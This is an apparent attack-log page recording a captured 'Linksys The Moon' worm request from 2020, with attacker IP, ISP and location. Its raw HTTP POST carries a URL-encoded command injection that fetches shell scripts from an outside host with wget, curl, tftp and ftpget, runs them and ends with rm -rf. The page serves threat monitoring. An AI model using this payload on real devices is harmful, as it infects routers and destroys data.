This website uses cookies to improve user experience. By using this website you consent to all cookies in accordance with our terms.

Dismiss
Click here for some search hints
1-1 of 1 results (1 page)

Linksys "The Moon" Worm

[Attack info]
Attacker: 209.141.51.85
Dest. port: 8080
Time: 11/09/2020 15:37:17
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS53667 FranTech Solutions
Location: Nevada, Las Vegas (zipcode 89101)
rDNS: clientvps.com
POST /tmUnblock.cgi HTTP/1.1 Content-Length: 736 accept-encoding: gzip, deflate Host: 176.94.18.109:8080 Accept: */* User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.33.1.el6.x86_64 connection: keep-alive Content-Type: application/x-www-form-urlencoded ttcp_ip=-h+%60cd+%2Ftmp+%7C%7C+cd+%2Fvar%2Frun+%7C%7C+cd+%2Fmnt+%7C%7C+cd+%2Froot+%7C%7C+cd+%2F%3B+wget+http%3A%2F%2F185.172.111.196%2Frouters-eps.sh%3B+curl+-O+http%3A%2F%2F185.172.111.196%2Frouters-eps.sh%3B+chmod+777+routers-eps.sh%3B+sh+routers-eps.sh%3B+tftp+185.172.111.196+-c+get+routers-eps3.sh%3B+chmod+777+routers-eps3.sh%3B+sh+routers-eps3.sh%3B+tftp+-r+routers-eps2.sh+-g+185.172.111.196%3B+chmod+777+routers-eps2.sh%3B+sh+routers-eps2.sh%3B+ftpget+-v+-u+anonymous+-p+anonymous+-P+21+185.172.111.196+routers-eps1.sh+routers-eps1.sh%3B+sh+routers-eps1.sh%3B+rm+-rf+routers-eps.sh+routers-eps3.sh+routers-eps2.sh+routers-eps1.sh%3B+rm+-rf+%2A%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1